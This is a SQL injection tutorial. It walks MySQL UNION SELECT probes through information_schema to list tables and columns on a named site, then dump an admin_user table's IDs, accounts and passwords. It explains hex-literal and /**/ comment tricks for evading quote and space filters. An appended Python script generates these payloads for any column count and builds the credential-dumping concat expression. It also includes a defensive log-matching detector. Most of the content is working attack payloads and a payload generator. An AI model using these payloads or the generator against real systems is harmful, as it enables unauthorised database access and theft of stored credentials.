Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

(".." and "n" stand for the filler columns: a UNION only works when its column count matches the original SELECT, and SCHEMA_NAME has to land in a column the page actually displays. "limit 1,1" returns the second schema; step the offset to walk them one at a time.)

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=HEX_OF_DATABASE_NAME/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=HEX_OF_TABLE_NAME/**/limit/**/1,1

(Writing the database and table names as 0x... hex literals keeps quotes out of the payload, so it still works when magic_quotes_gpc or a similar filter escapes single quotes; the /**/ inline comments stand in for spaces for the same reason. All of this depends on information_schema, which only exists in MySQL 5.0 and later.)
MySQL 5 advanced injection: dumping tables

Example:

1. Dump the tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
"and 1=2" makes the original WHERE clause match nothing, so the page renders the UNION row in place of the real record; the original query returns five columns and the fourth one is displayed, hence 1,2,3,TABLE_NAME,5; the trailing /* comments out whatever the application appends after the injection point. Stepping the limit offset (0,1 then 1,1 and so on), the 4th table to come out was admin_user.

2. Dump the columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
(0x61646D696E5F75736572 is admin_user; filtering on TABLE_SCHEMA as well avoids picking up a same-named table from another database on the server.)

3. Dump the password
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
(0x7c is "|", used as a separator so all three columns come back through the single displayed field as |ID|ACCOUNT|PASSWORD|.)
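The two halves of the procedure above, the hex-literal trick and the UNION/information_schema probe walked with a LIMIT offset, are easy to get subtly wrong by hand (column count, which column is displayed, the offset). The following Python script is an added example written for this page, not code from the original post: it encodes names the way the post does (checked against the post's own 0x79645F7465616D6E6574 and 0x61646D696E5F75736572), generalises the three probes to any column count and display position, builds the concat(0x7c,...) expression of step 3, and then turns the same knowledge around into a check that flags such probes in web-server access logs after undoing the /**/ and URL-encoding evasions. The path /ccaus_content.php, the parameter ccausid, the IP addresses and the log lines in SAMPLE_LOG are constructed sample data; the detector is a normalisation-plus-regex heuristic, not a full WAF rule.

```python
"""information_schema enumeration: payload builder and a request-log check.

Added example written for this page, not code from the original post.  The
hex encoder and payload builder reproduce the shape of the post's own probes;
the path /ccaus_content.php, the parameter ccausid, the IP addresses and the
log lines in SAMPLE_LOG are constructed sample data.
"""
import re
from urllib.parse import unquote_plus


def mysql_hex(s: str) -> str:
    """Encode a string as a quote-free MySQL hex literal, e.g. 'yd_teamnet' -> 0x79645F7465616D6E6574."""
    return "0x" + s.encode("utf-8").hex().upper()


def mysql_unhex(lit: str) -> str:
    """Reverse of mysql_hex; handy for reading payloads found in logs."""
    return bytes.fromhex(lit[2:]).decode("utf-8")


def union_payload(ncols, pos, expr, table, where="", offset=0):
    """One UNION SELECT probe in the post's style (spaces as /**/, trailing /*).

    ncols  - number of columns the original SELECT returns; the UNION fails otherwise
    pos    - 1-based index of the column the page actually displays
    expr   - what to read into that column (TABLE_NAME, COLUMN_NAME, concat(...))
    where  - WHERE clause with names already hex-encoded and spaces as /**/
    offset - LIMIT offset; step 0,1,2,... to walk the rows one at a time
    """
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = expr
    parts = ["and", "1=2", "union", "select", ",".join(cols), "from", table]
    if where:
        parts += ["where", where]
    parts += ["limit", f"{offset},1"]
    return "/**/".join(parts) + "/*"


def concat_expr(columns, sep="|"):
    """concat(0x7C,c1,0x7C,c2,...,0x7C): several columns through one displayed field."""
    h = mysql_hex(sep)
    inner = [h]
    for c in columns:
        inner += [c, h]
    return "concat(" + ",".join(inner) + ")"


# --- detection side: undo the evasions, then look for the probe signature ---
_COMMENT = re.compile(r"/\*.*?(?:\*/|$)")   # /**/ fillers and the trailing /*
_PROBE = re.compile(r"\bunion\b.*\bselect\b.*\binformation_schema\.", re.I)


def normalize(url: str) -> str:
    """URL-decode, replace inline comments with spaces, collapse whitespace."""
    s = _COMMENT.sub(" ", unquote_plus(url))
    return re.sub(r"\s+", " ", s).strip().lower()


def is_schema_probe(url: str) -> bool:
    """True for a UNION SELECT that reads information_schema, however it is spaced or encoded."""
    return bool(_PROBE.search(normalize(url)))


def flag_requests(log_lines):
    """Return (line number, request target) for every access-log line that looks like a probe."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and is_schema_probe(m.group(1)):
            hits.append((n, m.group(1)))
    return hits


# Constructed sample access-log lines: a normal hit, the post's table probe,
# the same style of column probe URL-encoded, and a benign "union" search.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /ccaus_content.php?ccausid=13240 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2010:13:55:41 +0000] "GET /ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* HTTP/1.1" 200 4870',
    '203.0.113.5 - - [10/Oct/2010:13:55:49 +0000] "GET /ccaus_content.php?ccausid=13240%2F%2A%2A%2Fand%2F%2A%2A%2F1%3D2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2CCOLUMN_NAME%2C5%2F%2A%2A%2FFrom%2F%2A%2A%2Finformation_schema.COLUMNS%2F%2A%2A%2Flimit%2F%2A%2A%2F0%2C1%2F%2A HTTP/1.1" 200 4870',
    '198.51.100.7 - - [10/Oct/2010:13:56:02 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 2210',
]


if __name__ == "__main__":
    where = "TABLE_SCHEMA=" + mysql_hex("yd_teamnet")
    for off in range(4):   # walk the first four tables, as the post did
        print(union_payload(5, 4, "TABLE_NAME", "information_schema.TABLES", where, off))
    print(union_payload(5, 4, concat_expr(["ID", "ACCOUNT", "PASSWORD"]), "admin_user"))
    for n, url in flag_requests(SAMPLE_LOG):
        print(f"line {n}: probe -> {normalize(url)[:60]}...")
```

The detector deliberately normalises before matching: a rule that looks for the literal string "union select" misses every payload on this page, because the spaces are comments, and misses the URL-encoded variant as well. On the offensive side, note that union_payload assumes you have already found the column count and the displayed column (the 5 and the 4 in the post's URLs); with the wrong count MySQL returns an error instead of a row.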